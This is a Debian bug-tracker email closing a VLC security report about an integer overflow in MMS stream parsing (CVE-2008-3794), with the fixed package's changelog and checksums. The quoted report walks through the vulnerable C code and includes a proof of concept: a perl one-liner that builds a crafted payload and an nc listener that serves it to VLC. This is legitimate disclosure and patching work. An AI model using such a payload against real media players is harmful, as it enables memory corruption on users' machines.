Your message dated Wed, 27 Aug 2008 09:47:13 +0000 with message-id <[EMAIL PROTECTED]> and subject line Bug#496265: fixed in vlc 0.8.6.i-2 has caused the Debian Bug report #496265, regarding vlc: buffer overflow in mms handling to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact [EMAIL PROTECTED] immediately.) -- 496265: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496265 Debian Bug Tracking System Contact [EMAIL PROTECTED] with problems
--- Begin Message ---Package: vlc Version: 0.8.6.i-1 Severity: grave Tags: security Hi, the following security issue was published for vlc static int mms_ReceiveCommand( access_t *p_access ) { access_sys_t *p_sys = p_access->p_sys; for( ;; ) { int i_used; int i_status; if( NetFillBuffer( p_access ) < 0 ) { msg_Warn( p_access, "cannot fill buffer" ); return VLC_EGENERIC; } if( p_sys->i_buffer_tcp > 0 ) { [1] i_status = mms_ParseCommand( p_access, p_sys->buffer_tcp, p_sys->i_buffer_tcp, &i_used ); [2] if( i_used < MMS_BUFFER_SIZE ) { [3] memmove( p_sys->buffer_tcp, p_sys->buffer_tcp + i_used, MMS_BUFFER_SIZE - i_used ); //BUG! i_used overflow (...) [1] - function that sets i_used to negative value, see below [2] - i_used is signed, so predicate is true [3] - actual overflow, we have good control over what is written static int mms_ParseCommand( access_t *p_access, uint8_t *p_data, int i_data, int *pi_used ) (...) i_length = GetDWLE( p_data + 8 ) + 16; (...) if( i_length > p_sys->i_cmd ) { msg_Warn( p_access, "truncated command (missing %d bytes)", i_length - i_data ); p_sys->i_command = 0; return -1; } [1] else if( i_length < p_sys->i_cmd ) { p_sys->i_cmd = i_length; [2] *pi_used = i_length; } (...) [1] - predicate is true [2] - sets i_used from mms_ReceiveCommand - - Proof of concept - on localhost: perl -e 'print "aaaa\xce\xfa\x0b\xb0\xef\xff\xef\xff"; print "a"x100' > headshot nc -l -v -p 1755 < headshot open this url in VLC: mmst://127.0.0.1/ I can confirm this issue exists. Please see http://www.orange-bat.com/adv/2008/adv.08.24.txt for the original advisory. I'll follow up on this bug report with a CVE id soon. Kind regards Nico -- Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF For security reasons, all text in this mail is double-rot13 encrypted.
pgpJvvvyeo4kv.pgp
Description: PGP signature
--- End Message ---
--- Begin Message ---Source: vlc Source-Version: 0.8.6.i-2 We believe that the bug you reported is fixed in the latest version of vlc, which is due to be installed in the Debian FTP archive: libvlc0-dev_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0-dev_0.8.6.i-2_amd64.deb libvlc0_0.8.6.i-2_amd64.deb to pool/main/v/vlc/libvlc0_0.8.6.i-2_amd64.deb mozilla-plugin-vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/mozilla-plugin-vlc_0.8.6.i-2_amd64.deb vlc-nox_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-nox_0.8.6.i-2_amd64.deb vlc-plugin-arts_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-arts_0.8.6.i-2_amd64.deb vlc-plugin-esd_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-esd_0.8.6.i-2_amd64.deb vlc-plugin-ggi_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-ggi_0.8.6.i-2_amd64.deb vlc-plugin-jack_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-jack_0.8.6.i-2_amd64.deb vlc-plugin-sdl_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-sdl_0.8.6.i-2_amd64.deb vlc-plugin-svgalib_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc-plugin-svgalib_0.8.6.i-2_amd64.deb vlc_0.8.6.i-2.diff.gz to pool/main/v/vlc/vlc_0.8.6.i-2.diff.gz vlc_0.8.6.i-2.dsc to pool/main/v/vlc/vlc_0.8.6.i-2.dsc vlc_0.8.6.i-2_amd64.deb to pool/main/v/vlc/vlc_0.8.6.i-2_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Sam Hocevar (Debian packages) <[EMAIL PROTECTED]> (supplier of updated vlc package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.8 Date: Tue, 26 Aug 2008 23:25:13 +0000 Source: vlc Binary: vlc vlc-nox libvlc0 libvlc0-dev vlc-plugin-esd vlc-plugin-sdl vlc-plugin-ggi vlc-plugin-glide vlc-plugin-arts mozilla-plugin-vlc vlc-plugin-svgalib vlc-plugin-jack Architecture: source amd64 Version: 0.8.6.i-2 Distribution: experimental Urgency: high Maintainer: Debian multimedia packages maintainers <[EMAIL PROTECTED]> Changed-By: Sam Hocevar (Debian packages) <[EMAIL PROTECTED]> Description: libvlc0 - multimedia player and streamer library libvlc0-dev - development files for VLC mozilla-plugin-vlc - multimedia plugin for web browsers based on VLC vlc - multimedia player and streamer vlc-nox - multimedia player and streamer (without X support) vlc-plugin-arts - aRts audio output plugin for VLC vlc-plugin-esd - Esound audio output plugin for VLC vlc-plugin-ggi - GGI video output plugin for VLC vlc-plugin-glide - Glide video output plugin for VLC vlc-plugin-jack - Jack audio plugins for VLC vlc-plugin-sdl - SDL video and audio output plugin for VLC vlc-plugin-svgalib - SVGAlib video output plugin for VLC Closes: 496265 Changes: vlc (0.8.6.i-2) experimental; urgency=high . [ Loic Minier ] * Fix changelog entries for 0.8.6.h-2 and 0.8.6.h-3. * Bump up Standards-Version to 3.8.0. . [ Christophe Mutricy ] * Security: Fix integer overflow in mms module (CVE-2008-3794) (Closes: #496265)(407-mms-overflow.diff taken from upstream) . [ Sam Hocevar ] * debian/patches/300_manpage_syntax.diff: fix vlc-config.1 syntax. Checksums-Sha1: 6ce41230b85bade483df7ee3b7e5b9a0c3fb22f2 3053 vlc_0.8.6.i-2.dsc fb46ba02378bb76212e544a7b9ff8016743f4b24 41590 vlc_0.8.6.i-2.diff.gz 15c152a6012f45e0bd328186d5bd99df00ba4d37 1102526 vlc_0.8.6.i-2_amd64.deb e7fc90fb76b92079bab8fa6cda8616c596d9fcbb 4962976 vlc-nox_0.8.6.i-2_amd64.deb 8f7bf99438823c72eef11e8d1bf8e4b466a1c465 464238 libvlc0_0.8.6.i-2_amd64.deb e64fbde1b3f4f5a06970f00afcee6f4224f5254b 501438 libvlc0-dev_0.8.6.i-2_amd64.deb 7a3b1e996edb12b1e2431867da729f368026dd6c 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb e250288acb3bb744672d79eb30b54f600e204da7 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb 252a78ad8775731b98c0229da476fcf6b53c62db 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb 379ed8f013cf4494a3cb51faa2096866857aa92a 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb 27cba01a90a8f31a0ccde3a4ca651f40aae398cc 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb 552b5b988c4fecef16f7751ec8f702786e0f3857 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb e862fd9b83940854fb644cabe575435a077c4bac 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb Checksums-Sha256: 581cdd58a6ee198bf9019950d5c3baa971e0f3dc17fe045ac001958022ec3b23 3053 vlc_0.8.6.i-2.dsc 725a91468fd18b04af6f974c54aff095907bf34278bd9e0e52cd2317601526d7 41590 vlc_0.8.6.i-2.diff.gz 55cfdfe0edcc4a88c3708ab44ac30f6cedf70a60769cf67006a7591e8947f891 1102526 vlc_0.8.6.i-2_amd64.deb 9dba971b25565ce4e24b37c720a595230d3101485b0dbdef7b3cb943df640879 4962976 vlc-nox_0.8.6.i-2_amd64.deb 2f877723c444dd530705be40acd7f53883ac4eb2e299bc6bd6ac19e18ea1102a 464238 libvlc0_0.8.6.i-2_amd64.deb eacfecf0a7ea8541f58f575a1f8e572e4a582f7ea3b15486854908717a011e24 501438 libvlc0-dev_0.8.6.i-2_amd64.deb 263cc9aad3a6ce8ec2b163c711ec8295ae40e19a11dc54be4b1b29d11ccb8c0f 4526 vlc-plugin-esd_0.8.6.i-2_amd64.deb 70de28056245a4abed8c16b2002e433c4f0442233e60d69e8430eea2f8ba0dff 11680 vlc-plugin-sdl_0.8.6.i-2_amd64.deb 010bdd14c36b99ade3226eece0ba6b5ebdc3c0e31f9bb89373924f1d8b6cb299 6178 vlc-plugin-ggi_0.8.6.i-2_amd64.deb ca1846d9697c92c888f94df023e60f51eb8daabb4c5ed88e2505382be4e9f13c 4172 vlc-plugin-arts_0.8.6.i-2_amd64.deb aa3c8b70078adbcbb40dbb67a92f9f4310a69ee04044e8f8bdf28ece4fc3a44b 37362 mozilla-plugin-vlc_0.8.6.i-2_amd64.deb a7425191b06c2def81d3c0a9e2a4923369b964cd0fabdd2f163fbf47ec1b0c22 4758 vlc-plugin-svgalib_0.8.6.i-2_amd64.deb 8da779e07e39268b0c2e9993bd0fedfe9fe71d5acb03049b71cbd8171da3cab8 4932 vlc-plugin-jack_0.8.6.i-2_amd64.deb Files: dd7c02d8cd97e974a0f44c5349089bd5 3053 graphics optional vlc_0.8.6.i-2.dsc 4ea59a106261082284cf3c96e0280bcb 41590 graphics optional vlc_0.8.6.i-2.diff.gz 74c76d66a462d8ceaf91cdebb922579b 1102526 graphics optional vlc_0.8.6.i-2_amd64.deb 3539915e8c0f8646304393521578da52 4962976 net optional vlc-nox_0.8.6.i-2_amd64.deb 71569170cfa7c9e001d39953f128ffd4 464238 libs optional libvlc0_0.8.6.i-2_amd64.deb 52ae490cb3a7340da9c5e21f76dc06bd 501438 libdevel optional libvlc0-dev_0.8.6.i-2_amd64.deb f593434b22807e62ffe9a32c8385ca46 4526 graphics optional vlc-plugin-esd_0.8.6.i-2_amd64.deb a138f20aa47e542809507fade0e96fe2 11680 graphics optional vlc-plugin-sdl_0.8.6.i-2_amd64.deb e3623188392f573e25da31edb974dfc9 6178 graphics optional vlc-plugin-ggi_0.8.6.i-2_amd64.deb 58adfd3cae2f7d57addd5bc7f00b6341 4172 graphics optional vlc-plugin-arts_0.8.6.i-2_amd64.deb a5dec890b8d86bca13a21df588e0e498 37362 graphics optional mozilla-plugin-vlc_0.8.6.i-2_amd64.deb 6b1f3cbf95b2d81057cee9e16113d88f 4758 graphics optional vlc-plugin-svgalib_0.8.6.i-2_amd64.deb aef2c31effd382c35a79b5c71959787c 4932 graphics optional vlc-plugin-jack_0.8.6.i-2_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iEUEARECAAYFAki0m18ACgkQfPP1rylJn2GCNwCXZvEAHX/+GcnmHdxFhm0Vh103 /wCglAPJpSK6Ce84z8zJKFX3onttt4g= =WsNO -----END PGP SIGNATURE-----
--- End Message ---
